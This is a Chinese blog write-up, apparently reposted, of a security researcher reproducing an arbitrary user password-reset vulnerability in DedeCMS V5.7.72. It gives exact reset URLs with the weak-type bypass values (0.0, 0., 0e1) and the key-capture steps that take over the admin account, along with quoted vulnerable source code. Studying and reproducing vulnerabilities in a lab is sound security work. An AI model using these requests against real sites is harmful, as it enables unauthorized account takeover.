标签:new 用户密码 触发点 情况下 返回结果 values 操作 apache glob
好几天没审计了,就来复现一下这个cms,难度也不是太高。
1:首先利用弱类型进入密码重置
http://127.0.0.1/dedecms/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
admin默认mid是1
2:通过抓包获取到?key?值
3:去掉多余的字符访问修改密码链接
dedecms/member/resetpassword.php?dopost=getpasswd&id=1&key=xxxxx
这样我们就跳转得到了密码重置页面
环境DeDecms(织梦CMS) V5.7.72+php7.2+apache
漏洞文件入口:
member/resetpassword.php?文件
这里是一个重新设置登陆密码功能,我们使用的是使用安全问题找回密码:
$dopost?==?"safequestion"
通过传入的?$mid?对应的?id?值来查询对应用户的安全问题
这里的大问题就是使用==判断安全问题和安全问题答案,这就给了我们利用弱类型绕过的可能,我们就可以绕过验证进行下一步的密码重置
怎么绕过呢?
假设用户没有设置安全问题和答案,那么默认情况下安全问题的值为?0?,答案的值为?null?(这里是数据库中的值,即?$row[‘safequestion‘]="0"?、?$row[‘safeanswer‘]=null?)。当没有设置?safequestion?和?safeanswer?的值时,它们的值均为空字符串。第11行的if表达式也就变成了?if(‘0‘ == ‘‘ && null == ‘‘)?,即?if(false && true)?,所以我们只要让表达式?$row[‘safequestion‘] == $safequestion?为?true?即可。下图是?null == ‘‘?的判断结果:
我们可以利用?php弱类型?的特点,来绕过这里?$row[‘safequestion‘] == $safequestion?的判断,通过测试找到了三个的payload,分别是?0.0?、?0.?、?0e1?,这三种类型payload均能使得?$row[‘safequestion‘] == $safequestion?为?true?,即成功进入?sn?函数。
默认状态下,临时密码的表为空,如下
mysql> select * from dede_pwd_tmp;
Empty set (0.00 sec
当我们访问完payload时,
链接会自动跳转到http://localhost/dedecms/member/resetpassword.php?dopost=getpasswd&id=1&key=xxxx
key的值就是admin的临时密码,这时再查询数据库的临时密码表,你会发现多了一条admin的记录
这也是为什么
执行?SELECT * FROM #@__pwd_tmp WHERE mid = ‘$mid‘?语句时,返回结果为空
我们看到继续执行了newmail函数执行插入操作:
function?newmail($mid,?$userid,?$mailto,?$type,?$send)
{
????global?$db,$cfg_adminemail,$cfg_webname,$cfg_basehost,$cfg_memberurl;
????$mailtime?=?time();
????$randval?=?random(8);
????$mailtitle?=?$cfg_webname.":密码修改";
????$mailto?=?$mailto;
????$headers?=?"From:?".$cfg_adminemail."\r\nReply-To:?$cfg_adminemail";
????$mailbody?=?"亲爱的".$userid.":\r\n您好!感谢您使用".$cfg_webname."网。\r\n".$cfg_webname."应您的要求,重新设置密码:(注:如果您没有提出申请,请检查您的信息是否泄漏。)\r\n本次临时登陆密码为:".$randval."?请于三天内登陆下面网址确认修改。\r\n".$cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid;
????if($type?==?‘INSERT‘)
????{
????????$key?=?md5($randval);
????????$sql?=?"INSERT?INTO?`#@__pwd_tmp`?(`mid`?,`membername`?,`pwd`?,`mailtime`)VALUES?(‘$mid‘,?‘$userid‘,??‘$key‘,?‘$mailtime‘);";
????????if($db->ExecuteNoneQuery($sql))
????????{
????????????if($send?==?‘Y‘)
????????????{
????????????????sendmail($mailto,$mailtitle,$mailbody,$headers);
????????????????return?ShowMsg(‘EMAIL修改验证码已经发送到原来的邮箱请查收‘,?‘login.php‘,‘‘,‘5000‘);
????????????}?else?if?($send?==?‘N‘)
????????????{
????????????????return?ShowMsg(‘稍后跳转到修改页‘,?$cfg_basehost.$cfg_memberurl."/resetpassword.php?dopost=getpasswd&id=".$mid."&key=".$randval);
????????????}
该代码主要功能是发送邮件至相关邮箱,并且插入一条记录至?dede_pwd_tmp?表中。而恰好漏洞的触发点就在这里,我们看看?第13行?至?第18行?的代码,如果?($send == ‘N‘)?这个条件为真,通过?ShowMsg?打印出修改密码功能的链接。?第17行?修改密码链接中的?$mid?参数对应的值是用户id,而?$randval?是在第一次?insert?操作的时候将其?md5?加密之后插入到?dede_pwd_tmp?表中,并且在这里已经直接回显给用户。那么这里拼接的url其实是
http://127.0.0.1/member/resetpassword.php?dopost=getpasswd&id=$mid&key=$randval
也就是说这里的id,key我们可控
继续跟进一下?dopost=getpasswd?的操作,相关代码位置在?member/resetpassword.php?中,
我们先从96行看,dopost=getpasswd时
会先判断id是否为空
如果不为空,进入
$row?=?$db->GetOne("SELECT?*?FROM?#@__pwd_tmp?WHERE?mid?=?‘$mid‘");
这里如果$row为空,就会退出,但是我们第一步payload使得mid已经在临时密码表中存在了,所以一定不为空,继续执行:
判断时间是否超时,如果没有,进入
templets/resetpassword2.htm
我们去看看
这里密码修改页面会将?$setp?赋值为2
由于现在的数据包中?$setp=2?,因此这部分功能代码实现又回到了?member/resetpassword.php?文件中。
从临时密码表中取出来key和我们前端url中的key对比,相等执行密码修改。
到此,这就是整个漏洞利用过程。
这里我们使用test账户重置admin密码
开始也提过了
1:首先利用弱类型进入密码重置
http://127.0.0.1/dedecms/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=1
admin默认mid是1
2:通过抓包获取到?key?值:key=KUvaNLpw
此时临时密码表中有了我们的key:
3:去掉多余的字符访问修改密码链接
dedecms/member/resetpassword.php?dopost=getpasswd&id=1&key=KUvaNLpw
这样我们就跳转得到了密码重置页面
这个漏洞利用还有一个条件:
网站开启了会员注册功能,如果不知道如何开启的话,可以按照下图进行开启测试
这里我一开始不知道。。导致耽误了一会时间。‘
还有就是一开始不知道默认后台是dede。。使用了爆破的方法。。
从网上直接找的dedecms检测插件也能检测出来漏洞:
这里看到有getsghell漏洞,确实存在不过不是这个
是后台存在多处fwrite函数导致getshellgetshell
这里这个不是我们的重点简单提一句。。
https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day4/files/README.md
DeDecms(织梦CMS) V5.7.72任意用户密码重置漏洞复现
标签:new 用户密码 触发点 情况下 返回结果 values 操作 apache glob
原文地址:https://www.cnblogs.com/wangtanzhi/p/12813642.html
